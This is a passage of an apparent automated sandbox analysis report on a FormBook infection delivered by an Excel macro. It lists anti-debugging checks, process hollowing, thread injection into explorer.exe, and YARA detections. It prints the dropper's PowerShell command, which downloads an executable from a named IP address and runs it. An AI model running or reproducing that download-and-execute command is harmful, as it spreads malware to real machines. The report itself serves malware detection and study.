Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D8239 mov eax, dword ptr fs:[00000030h] 19_2_032D8239
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h] 19_2_032FB236
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h] 19_2_032FB236
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h] 19_2_032FB236
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h] 19_2_032FB236
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h] 19_2_032FB236
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FB236 mov eax, dword ptr fs:[00000030h] 19_2_032FB236
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03314A2C mov eax, dword ptr fs:[00000030h] 19_2_03314A2C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03314A2C mov eax, dword ptr fs:[00000030h] 19_2_03314A2C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032E8A0A mov eax, dword ptr fs:[00000030h] 19_2_032E8A0A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339AA16 mov eax, dword ptr fs:[00000030h] 19_2_0339AA16
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339AA16 mov eax, dword ptr fs:[00000030h] 19_2_0339AA16
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F3A1C mov eax, dword ptr fs:[00000030h] 19_2_032F3A1C
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032DAA16 mov eax, dword ptr fs:[00000030h] 19_2_032DAA16
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032DAA16 mov eax, dword ptr fs:[00000030h] 19_2_032DAA16
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D5210 mov eax, dword ptr fs:[00000030h] 19_2_032D5210
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D5210 mov ecx, dword ptr fs:[00000030h] 19_2_032D5210
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D5210 mov eax, dword ptr fs:[00000030h] 19_2_032D5210
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D5210 mov eax, dword ptr fs:[00000030h] 19_2_032D5210
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0331927A mov eax, dword ptr fs:[00000030h] 19_2_0331927A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0338B260 mov eax, dword ptr fs:[00000030h] 19_2_0338B260
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0338B260 mov eax, dword ptr fs:[00000030h] 19_2_0338B260
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A8A62 mov eax, dword ptr fs:[00000030h] 19_2_033A8A62
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03315A69 mov eax, dword ptr fs:[00000030h] 19_2_03315A69
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03315A69 mov eax, dword ptr fs:[00000030h] 19_2_03315A69
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03315A69 mov eax, dword ptr fs:[00000030h] 19_2_03315A69
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03364257 mov eax, dword ptr fs:[00000030h] 19_2_03364257
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03391A5F mov eax, dword ptr fs:[00000030h] 19_2_03391A5F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339EA55 mov eax, dword ptr fs:[00000030h] 19_2_0339EA55
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D9240 mov eax, dword ptr fs:[00000030h] 19_2_032D9240
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D9240 mov eax, dword ptr fs:[00000030h] 19_2_032D9240
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D9240 mov eax, dword ptr fs:[00000030h] 19_2_032D9240
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D9240 mov eax, dword ptr fs:[00000030h] 19_2_032D9240
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03395A4F mov eax, dword ptr fs:[00000030h] 19_2_03395A4F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03395A4F mov eax, dword ptr fs:[00000030h] 19_2_03395A4F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03395A4F mov eax, dword ptr fs:[00000030h] 19_2_03395A4F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03395A4F mov eax, dword ptr fs:[00000030h] 19_2_03395A4F
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0330FAB0 mov eax, dword ptr fs:[00000030h] 19_2_0330FAB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h] 19_2_032D52A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h] 19_2_032D52A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h] 19_2_032D52A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h] 19_2_032D52A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D52A5 mov eax, dword ptr fs:[00000030h] 19_2_032D52A5
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D1AA0 mov eax, dword ptr fs:[00000030h] 19_2_032D1AA0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033012BD mov esi, dword ptr fs:[00000030h] 19_2_033012BD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033012BD mov eax, dword ptr fs:[00000030h] 19_2_033012BD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033012BD mov eax, dword ptr fs:[00000030h] 19_2_033012BD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03305AA0 mov eax, dword ptr fs:[00000030h] 19_2_03305AA0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03305AA0 mov eax, dword ptr fs:[00000030h] 19_2_03305AA0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032EAAB0 mov eax, dword ptr fs:[00000030h] 19_2_032EAAB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032EAAB0 mov eax, dword ptr fs:[00000030h] 19_2_032EAAB0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339129A mov eax, dword ptr fs:[00000030h] 19_2_0339129A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0330D294 mov eax, dword ptr fs:[00000030h] 19_2_0330D294
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0330D294 mov eax, dword ptr fs:[00000030h] 19_2_0330D294
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0330DA88 mov eax, dword ptr fs:[00000030h] 19_2_0330DA88
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0330DA88 mov eax, dword ptr fs:[00000030h] 19_2_0330DA88
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339B2E8 mov eax, dword ptr fs:[00000030h] 19_2_0339B2E8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339B2E8 mov eax, dword ptr fs:[00000030h] 19_2_0339B2E8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339B2E8 mov eax, dword ptr fs:[00000030h] 19_2_0339B2E8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339B2E8 mov eax, dword ptr fs:[00000030h] 19_2_0339B2E8
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03302AE4 mov eax, dword ptr fs:[00000030h] 19_2_03302AE4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03394AEF mov eax, dword ptr fs:[00000030h] 19_2_03394AEF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D3ACA mov eax, dword ptr fs:[00000030h] 19_2_032D3ACA
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A8ADD mov eax, dword ptr fs:[00000030h] 19_2_033A8ADD
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D5AC0 mov eax, dword ptr fs:[00000030h] 19_2_032D5AC0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D5AC0 mov eax, dword ptr fs:[00000030h] 19_2_032D5AC0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D5AC0 mov eax, dword ptr fs:[00000030h] 19_2_032D5AC0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D12D4 mov eax, dword ptr fs:[00000030h] 19_2_032D12D4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03302ACB mov eax, dword ptr fs:[00000030h] 19_2_03302ACB
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0330513A mov eax, dword ptr fs:[00000030h] 19_2_0330513A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0330513A mov eax, dword ptr fs:[00000030h] 19_2_0330513A
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F4120 mov eax, dword ptr fs:[00000030h] 19_2_032F4120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F4120 mov eax, dword ptr fs:[00000030h] 19_2_032F4120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F4120 mov eax, dword ptr fs:[00000030h] 19_2_032F4120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F4120 mov eax, dword ptr fs:[00000030h] 19_2_032F4120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F4120 mov ecx, dword ptr fs:[00000030h] 19_2_032F4120
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D3138 mov ecx, dword ptr fs:[00000030h] 19_2_032D3138
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D9100 mov eax, dword ptr fs:[00000030h] 19_2_032D9100
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D9100 mov eax, dword ptr fs:[00000030h] 19_2_032D9100
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D9100 mov eax, dword ptr fs:[00000030h] 19_2_032D9100
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032E0100 mov eax, dword ptr fs:[00000030h] 19_2_032E0100
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032E0100 mov eax, dword ptr fs:[00000030h] 19_2_032E0100
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032E0100 mov eax, dword ptr fs:[00000030h] 19_2_032E0100
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032DC962 mov eax, dword ptr fs:[00000030h] 19_2_032DC962
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339E962 mov eax, dword ptr fs:[00000030h] 19_2_0339E962
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032DB171 mov eax, dword ptr fs:[00000030h] 19_2_032DB171
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032DB171 mov eax, dword ptr fs:[00000030h] 19_2_032DB171
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033A8966 mov eax, dword ptr fs:[00000030h] 19_2_033A8966
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03391951 mov eax, dword ptr fs:[00000030h] 19_2_03391951
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FB944 mov eax, dword ptr fs:[00000030h] 19_2_032FB944
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FB944 mov eax, dword ptr fs:[00000030h] 19_2_032FB944
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D395E mov eax, dword ptr fs:[00000030h] 19_2_032D395E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032D395E mov eax, dword ptr fs:[00000030h] 19_2_032D395E
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033551BE mov eax, dword ptr fs:[00000030h] 19_2_033551BE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033551BE mov eax, dword ptr fs:[00000030h] 19_2_033551BE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033551BE mov eax, dword ptr fs:[00000030h] 19_2_033551BE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033551BE mov eax, dword ptr fs:[00000030h] 19_2_033551BE
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033099BC mov eax, dword ptr fs:[00000030h] 19_2_033099BC
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033061A0 mov eax, dword ptr fs:[00000030h] 19_2_033061A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033061A0 mov eax, dword ptr fs:[00000030h] 19_2_033061A0
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h] 19_2_032F99BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h] 19_2_032F99BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F99BF mov eax, dword ptr fs:[00000030h] 19_2_032F99BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h] 19_2_032F99BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h] 19_2_032F99BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F99BF mov eax, dword ptr fs:[00000030h] 19_2_032F99BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h] 19_2_032F99BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h] 19_2_032F99BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F99BF mov eax, dword ptr fs:[00000030h] 19_2_032F99BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h] 19_2_032F99BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F99BF mov ecx, dword ptr fs:[00000030h] 19_2_032F99BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032F99BF mov eax, dword ptr fs:[00000030h] 19_2_032F99BF
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033569A6 mov eax, dword ptr fs:[00000030h] 19_2_033569A6
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033949A4 mov eax, dword ptr fs:[00000030h] 19_2_033949A4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033949A4 mov eax, dword ptr fs:[00000030h] 19_2_033949A4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033949A4 mov eax, dword ptr fs:[00000030h] 19_2_033949A4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_033949A4 mov eax, dword ptr fs:[00000030h] 19_2_033949A4
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03302990 mov eax, dword ptr fs:[00000030h] 19_2_03302990
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_03304190 mov eax, dword ptr fs:[00000030h] 19_2_03304190
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_032FC182 mov eax, dword ptr fs:[00000030h] 19_2_032FC182
Source: C:\Windows\SysWOW64\wlanext.exe Code function: 19_2_0339A189 mov eax, dword ptr fs:[00000030h] 19_2_0339A189
Checks if the current process is being debugged
Source: C:\Users\Public\eVJOpc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\eVJOpc.exe Code function: 9_2_00409B50 LdrLoadDll, 9_2_00409B50

HIPS / PFW / Operating System Protection Evasion:

barindex
Sample uses process hollowing technique
Source: C:\Users\Public\eVJOpc.exe Section unmapped: C:\Windows\SysWOW64\wlanext.exe base address: DA0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\eVJOpc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\eVJOpc.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\eVJOpc.exe Section loaded: unknown target: C:\Windows\SysWOW64\wlanext.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\eVJOpc.exe Memory written: C:\Users\Public\eVJOpc.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\eVJOpc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\eVJOpc.exe Thread register set: target process: 3352 Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -nop [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri http://212.192.241.75/sam/new3.exe -OutFile $env:public\eVJOpc.exe;explorer $env:public\eVJOpc.exe Jump to behavior
Yara detected Xls With Macro 4.0
Source: Yara match File source: app.xml, type: SAMPLE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\explorer.exe 'C:\Windows\system32\explorer.exe' C:\Users\Public\eVJOpc.exe Jump to behavior
Source: C:\Users\Public\eVJOpc.exe Process created: C:\Users\Public\eVJOpc.exe 'C:\Users\Public\eVJOpc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\wlanext.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\eVJOpc.exe' Jump to behavior
Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000002.559932711.0000000000B68000.00000004.00000020.sdmp Binary or memory string: Progman\Pr
Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000002.561411411.0000000000FA0000.00000002.00020000.sdmp, explorer.exe, 0000000A.00000000.375021132.00000000011E0000.00000002.00020000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.402916350.0000000008778000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndh

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 8_2_004030FB
Source: C:\Users\Public\eVJOpc.exe Code function: 8_2_10004030 GetProcessHeap,HeapAlloc,GetUserNameW,lstrcmpW,GetProcessHeap,HeapFree, 8_2_10004030

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
AV process strings found (often used to terminate AV products)
Source: explorer.exe, 0000000A.00000000.397828663.00000000047D0000.00000004.00000001.sdmp Binary or memory string: \\192.168.2.1\all\procexp.exe
Source: explorer.exe, 0000000A.00000000.402916350.0000000008778000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Windows Defender\MSASCui.exe
Source: explorer.exe, 0000000A.00000000.397828663.00000000047D0000.00000004.00000001.sdmp Binary or memory string: "c:\users\user\desktop\procexp.exe

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 8.2.eVJOpc.exe.f040000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.1.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.0.eVJOpc.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.eVJOpc.exe.400000.0.raw.unpack, type: UNPACKEDPE
